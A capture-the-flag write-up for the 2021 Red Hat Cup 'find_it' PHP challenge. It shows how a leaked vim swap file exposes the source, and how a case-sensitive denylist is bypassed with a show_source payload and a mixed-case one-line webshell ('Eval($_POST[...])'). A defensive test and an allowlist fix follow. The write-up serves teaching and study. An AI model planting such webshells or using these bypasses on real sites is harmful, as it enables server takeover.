2021-The 4th Red Hat Cup Cyber Security Competition-find_it

Knowledge points covered

Regex filtering
Backup file leakage

Problem analysis

Scan the directory and find /robots.txt. Accessing it reveals 1ndexx.php.

1ndexx.php cannot be accessed directly. Instead, access the .swp swap file that vim saved in the production environment; accessing it gives the source code.

<?php

#Really easy...

# Reads the whole flag file into a variable
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));

# Output file, created under the web root
$hack=fopen("hack.php","w") or die("Unable 2 open");

# Attacker-controlled input from the query string
$a=$_GET['code'];

# Case-sensitive denylist: there is no /i modifier
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
# Length limit on the input
if(strlen($a)>33){
	die("nonono.");
}
# The user input is written first, then the flag.php source is appended after it
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

There are many regex filters, and the length cannot exceed 33. The value of $a is written into hack.php ahead of the contents of flag.php, so passing a show_source call makes hack.php display its own source, with highlighting:

code=%3C?php%20show_source(__FILE__);?%3E

You can also pass in a one-line webshell, using mixed upper and lower case to bypass the regex, and connect to /hack.php with AntSword to get.

code=<?php Eval($_POST[111]);?>
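To see exactly why the filter lets both payloads through, the following is an added PHP check, not code from the writeup or the challenge: it runs the challenge's own pattern, the same pattern with the /i modifier, and the 33-byte limit over constructed inputs, and ends with an assumed allowlist-based alternative (the storeSafely function and its directory are assumptions, not part of the challenge).

```php
<?php
// Added example, not part of the original writeup: runs the challenge's own
// denylist over constructed inputs to show which payloads it misses and why.

// The pattern copied from 1ndexx.php; note there is no /i modifier.
$pattern = '/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/';

// Same list with the /i modifier, so "Eval" and "__FILE__" match as well.
$ciPattern = $pattern . 'i';

// Mirrors the two checks in the challenge: a denylist hit, or longer than 33 bytes.
function isRejected(string $pattern, string $input): bool
{
    return preg_match($pattern, $input) === 1 || strlen($input) > 33;
}

// Constructed inputs: the two payloads from the writeup plus a lowercase control.
$inputs = [
    '<?php eval($_POST[111]);?>',      // "eval" matches: rejected by both patterns
    '<?php Eval($_POST[111]);?>',      // case-sensitive pattern misses "Eval"
    '<?php show_source(__FILE__);?>',  // no listed word; with /i, "FILE" hits "file"
];

foreach ($inputs as $in) {
    printf("%-33s  original:%-8s  with /i:%s\n", $in,
        isRejected($pattern, $in) ? 'rejected' : 'PASSES',
        isRejected($ciPattern, $in) ? 'rejected' : 'PASSES');
}

// Even with /i this is still a denylist applied to text that is then written
// into a .php file under the web root. The safer shape is an allowlist plus a
// path the web server never executes. Assumed defensive variant, not challenge code:
function storeSafely(string $input, string $dir): bool
{
    if (strlen($input) > 33 || !ctype_alnum($input)) {   // allowlist, not denylist
        return false;
    }
    // $dir is assumed to be outside the document root (for example /var/lib/app/notes),
    // so the content is stored as data and is never a script the server will run.
    return file_put_contents($dir . '/note.txt', $input, LOCK_EX) !== false;
}
```

The loop prints that the lowercase eval payload is rejected by both patterns, while the mixed-case Eval payload and the show_source payload pass the original pattern and are only caught once /i is added.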


Source: blog.csdn.net/h_adam/article/details/124390205